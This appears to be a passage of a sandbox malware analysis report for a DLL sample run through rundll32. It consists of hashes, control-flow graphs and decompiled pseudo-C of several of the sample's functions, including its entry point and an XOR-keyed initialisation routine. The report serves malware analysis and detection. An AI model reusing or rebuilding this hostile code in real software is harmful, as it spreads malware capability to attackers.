• Opcode ID: f613f848160ab7dd3e6ba5db84db6ccd510fa5f39f5191588a37659c76003010
• Instruction ID: f3e43adab79c1f8ce2e179bc7b3cb5d3398e726bb9d0e24f08d2a9bcac06c854
• Opcode Fuzzy Hash: f613f848160ab7dd3e6ba5db84db6ccd510fa5f39f5191588a37659c76003010
• Instruction Fuzzy Hash: 6C213AB6600218BFCB10DFE4DC89DCEBBBDEF89750B058465F906DB241DA319A41CBA0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 324 50a83b7-50a8406 326 50a8408-50a8419 324->326 327 50a8479-50a847e 324->327 329 50a841b-50a843b call 50a2049 326->329 330 50a8470 326->330 334 50a843d-50a8447 329->334 335 50a8466 329->335 330->327 337 50a844c-50a844e 334->337 336 50a846f 335->336 336->330 338 50a8460-50a8461 call 50a9039 337->338 339 50a8450-50a845f call 50a5544 337->339 338->335 339->338
Memory Dump Source
• Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
• Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
• Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
Similarity
• Opcode ID: 7f67f5a8bc8e3d8a726215b168acb453673c5280521dfb98b8c4c2c5f512cb01
• Instruction ID: 3d8edf501f80712079c7b99118b553813110f04b7c75a0bf925a3caa7b28a776
• Opcode Fuzzy Hash: 7f67f5a8bc8e3d8a726215b168acb453673c5280521dfb98b8c4c2c5f512cb01
• Instruction Fuzzy Hash: 2F2116B2A10218BFEB119FA5DC45EDEBFBDFF19740F108026F901A6110D7759A459BA0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 343 50a924f-50a926a 344 50a9309-50a9315 343->344 345 50a9270-50a9289 343->345 347 50a928b-50a92b6 345->347 348 50a9308 345->348 351 50a92b8-50a92c5 call 50a2049 347->351 352 50a92fe-50a9307 347->352 348->344 356 50a92fd 351->356 357 50a92c7-50a92d1 351->357 352->348 356->352 358 50a92d6-50a92d8 357->358 359 50a92da-50a92f4 358->359 360 50a92f7-50a92f8 call 50a9039 358->360 359->360 360->356
Memory Dump Source
• Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
• Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
• Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
Similarity
• Opcode ID: a139e509aa876f7f8782be556df060bd9f747080841b6c87d77417f88375575a
• Instruction ID: 5750b8fc6104a91d18a2719f0ba5dd9a2e386cfa6df10d66c2eb4eadb2d9081e
• Opcode Fuzzy Hash: a139e509aa876f7f8782be556df060bd9f747080841b6c87d77417f88375575a
• Instruction Fuzzy Hash: 2D213976A00209FFEB109F94EC84EEEBBB9EB44304F004066F911A6190DB758A15EB60
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 364 50a1b2f-50a1b9c call 50ab0c2 call 50aad5a 371 50a1b9e-50a1bab 364->371 372 50a1be4-50a1bea 364->372 376 50a1bad-50a1bb0 371->376 377 50a1bb2-50a1bba 371->377 375 50a1bec-50a1bf1 372->375 378 50a1bdb-50a1be2 376->378 379 50a1bc1-50a1bc3 377->379 378->375 380 50a1bd3-50a1bd9 379->380 381 50a1bc5-50a1bd1 379->381 380->375 380->378 381->375
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 1eb9e4a3a95ca845e8f85a06051969275de353ed21cddffee9a8f309d0d9da53
                                                                                                                                                                                                                                    • Instruction ID: 19c441ec290fd2cc5aca995d7eadddd46e5797cf33cfb6636ab88ca4aac222d2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eb9e4a3a95ca845e8f85a06051969275de353ed21cddffee9a8f309d0d9da53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121C077654608BBD721EBE4EC0AFCE7BA9BB88750F114161F606EB2D0EB709901CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 384 50a3d0d-50a3d3b call 50a83b7 387 50a3d59-50a3d61 384->387 388 50a3d3d-50a3d41 384->388 390 50a3d89-50a3d8d call 50a924f 387->390 391 50a3d63-50a3d73 call 50a7923 387->391 388->387 389 50a3d43-50a3d4e 388->389 389->387 392 50a3d50-50a3d57 389->392 396 50a3d92-50a3d94 390->396 391->390 397 50a3d75-50a3d77 391->397 392->387 392->392 398 50a3da2-50a3da8 396->398 399 50a3d96-50a3d9d 396->399 400 50a3d79-50a3d87 397->400 401 50a3d9f-50a3da1 397->401 399->398 399->401 400->398 401->398
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E050A3D0D(intOrPtr* _a4, void* _a8) {
                                                                                                                                                                                                                                    				void _v31;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t25 = 6;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				memset( &_v31, 0, _t25 << 2);
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                    				_t31 = 0; // executed
                                                                                                                                                                                                                                    				_t17 = E050A83B7( *0x50ad258,  &_v32); // executed
                                                                                                                                                                                                                                    				if(_t17 != 0 && _v31 > 2) {
                                                                                                                                                                                                                                    					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					if(_t23 > 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
                                                                                                                                                                                                                                    							_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						} while (_t26 < _t23);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t39 = _t31;
                                                                                                                                                                                                                                    				 *0x50ad270 = _t31;
                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					_t19 = E050A924F( &_a8); // executed
                                                                                                                                                                                                                                    					__eflags = _t19;
                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                    						__eflags = _a8 - 0x1000;
                                                                                                                                                                                                                                    						if(_a8 == 0x1000) {
                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t21 = E050A7923(_t26, _t39);
                                                                                                                                                                                                                                    					_t40 =  *0x50ad270; // 0xd448b889
                                                                                                                                                                                                                                    					 *_a8 = _t21;
                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							_push(5);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = 1;
                                                                                                                                                                                                                                    							 *0x50ad270 = _t21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5f87e4f241edbca79fbfcd141d69bce337d4ec787602f90ba09fc3272257f021
                                                                                                                                                                                                                                    • Instruction ID: ed2c4d827c3eb3236bb6bb50cd399d7efaa3e850985a05cc3586d16c2364d73f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f87e4f241edbca79fbfcd141d69bce337d4ec787602f90ba09fc3272257f021
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F011E373A00684AEDF609EF9FC44AFE7BE9BB54354F00493AE811D6180E774C186CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7515a5d1eab51dc18dc49c83d8f2210e00b4f16d5ac5ba71dfae17b51fda671b
                                                                                                                                                                                                                                    • Instruction ID: e74f996b6306c421f1aea9f04871b953122f38bfe44236102a256ca0899112de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7515a5d1eab51dc18dc49c83d8f2210e00b4f16d5ac5ba71dfae17b51fda671b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B0152737053256FD2219EA9AC4AF3F7FD8FB85690F160919F945C7240DA64C80286A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E050A21CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				signed short* _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t23 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t18 = 1;
                                                                                                                                                                                                                                    				_t26 = 0x50ad330;
                                                                                                                                                                                                                                    				E050A84D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E050A12D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E050A809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						__imp__( *0x50ad238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t26 = _t15;
                                                                                                                                                                                                                                    						_t26 = _t26 + 4;
                                                                                                                                                                                                                                    						_t23 = _t23 + 1;
                                                                                                                                                                                                                                    						if(_t23 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E050A84D5();
                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                    						_t21 =  *0x50ad338; // 0x71f9b70
                                                                                                                                                                                                                                    						_t11 =  *_t21 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t21 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t18;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t18 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    0x050a222d
                                                                                                                                                                                                                                    0x050a222f
                                                                                                                                                                                                                                    0x050a2235
                                                                                                                                                                                                                                    0x050a223c
                                                                                                                                                                                                                                    0x050a224c
                                                                                                                                                                                                                                    0x050a2244
                                                                                                                                                                                                                                    0x050a2247
                                                                                                                                                                                                                                    0x050a2247
                                                                                                                                                                                                                                    0x050a224f
                                                                                                                                                                                                                                    0x050a224f
                                                                                                                                                                                                                                    0x050a2258
                                                                                                                                                                                                                                    0x050a2258
                                                                                                                                                                                                                                    0x050a2222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 99970c5f1fbe3e073cad7b0e2366dae6de526f8ca5b0da63883ad7cb9f79ac9c
                                                                                                                                                                                                                                    • Instruction ID: c942f08ec48e117d6646026f225a081921aae7902f040830d95155ed128eff96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99970c5f1fbe3e073cad7b0e2366dae6de526f8ca5b0da63883ad7cb9f79ac9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F301F53B304206BAE710AEE6FC84FBE76A9EB95264F400035BD45C6050E6699C429720
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 439 50aa72d-50aa73d call 50a2049 442 50aa73f-50aa74f call 50a7b5d 439->442 443 50aa7a1-50aa7a3 439->443 446 50aa754-50aa758 442->446 444 50aa7a4-50aa7a7 443->444 447 50aa75a-50aa77d 446->447 448 50aa797-50aa79f call 50a9039 446->448 452 50aa788-50aa790 447->452 453 50aa77f-50aa786 447->453 448->444 454 50aa793-50aa795 452->454 453->454 454->444 454->448
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E050AA72D(intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 = E050A2049(_t9, 8);
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    					return _t11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    				_t2 = _t12 + 0x50ae1bc; // 0x6f0072
                                                                                                                                                                                                                                    				_t14 = E050A7B5D(_t2, _a4, _t28); // executed
                                                                                                                                                                                                                                    				_t27 = _t14;
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					E050A9039(_t14, _t28);
                                                                                                                                                                                                                                    					return _t27;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t17 =  *_t28;
                                                                                                                                                                                                                                    				_t3 = _t28 + 4; // 0x4
                                                                                                                                                                                                                                    				_t25 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    				_t4 = _t25 + 0x50ae1fc; // 0x740053
                                                                                                                                                                                                                                    				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					_t19 =  *_t28;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t19 + 8))(_t19);
                                                                                                                                                                                                                                    					_t14 = _a4;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                                                    					 *_a8 = _t28;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t27 < 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6a4ecc31a437ab2ec29ad68183175022c8187051f2e5b4321f495193e7db50e4
                                                                                                                                                                                                                                    • Instruction ID: 9472aef9f6ddb580f7c41c4d8a3e06c4672275c74e96d54b753a45027dee950b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a4ecc31a437ab2ec29ad68183175022c8187051f2e5b4321f495193e7db50e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC018037300A15ABC712DAE8EC44F9F77BAAFD9750F148429B549CF280DA72D802C7A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E050A96A4(void* __ecx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                    				intOrPtr _t17;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t10 =  *0x50ad270; // 0xd448b889
                                                                                                                                                                                                                                    				_v8 = _t10;
                                                                                                                                                                                                                                    				_v12 = _t10;
                                                                                                                                                                                                                                    				_t23 = 0; // executed
                                                                                                                                                                                                                                    				_t12 = E050A21CD(__ecx,  &_v12); // executed
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_t14 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    					_t4 = _t14 + 0x50ae796; // 0x74666f53
                                                                                                                                                                                                                                    					_t17 = E050A7A9A(_t4, 0);
                                                                                                                                                                                                                                    					 *0x50ad33c = _t17;
                                                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                                                    						_t18 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    						_v8 = _v8 ^ 0x738bb12a;
                                                                                                                                                                                                                                    						_t8 = _t18 + 0x50ae862; // 0x61636f4c
                                                                                                                                                                                                                                    						_t21 = E050A7A9A(_t8, 1);
                                                                                                                                                                                                                                    						 *0x50ad344 = _t21;
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t23;
                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 509aecf1c94f217e00ce2dbf6743c007f9b99d49381e5b1e243c689462499a0b
                                                                                                                                                                                                                                    • Instruction ID: eab8fe06f9e03ab97a20de08eeea485fe61261c9c7f943f4abf1df9614bea527
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 509aecf1c94f217e00ce2dbf6743c007f9b99d49381e5b1e243c689462499a0b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F03C73621119ABCB21DFF8EA858CE7BFCEB58200F104063E502D7200EA74D605CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			_entry_(intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = 1;
                                                                                                                                                                                                                                    				_t4 = _a8;
                                                                                                                                                                                                                                    				if(_t4 == 0) {
                                                                                                                                                                                                                                    					__imp__(0x50ad23c);
                                                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                                                    						E050A970F();
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t7 = _t4 - 1;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						__imp__(0x50ad23c);
                                                                                                                                                                                                                                    						if(_t7 == 1) {
                                                                                                                                                                                                                                    							_t8 = E050A6A56(_t7, _t9, _t10, _v0); // executed
                                                                                                                                                                                                                                    							if(_t8 != 0) {
                                                                                                                                                                                                                                    								_t12 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    0x050a8063
                                                                                                                                                                                                                                    0x050a809c

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a0cc20060573337b2ec684ef620cdf85caac366d9b751a14083cac8b7cb1c49a
                                                                                                                                                                                                                                    • Instruction ID: b07fa011b10f177b014ffbc941b839f018548e25ab2ef28487e53a03485face0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0cc20060573337b2ec684ef620cdf85caac366d9b751a14083cac8b7cb1c49a
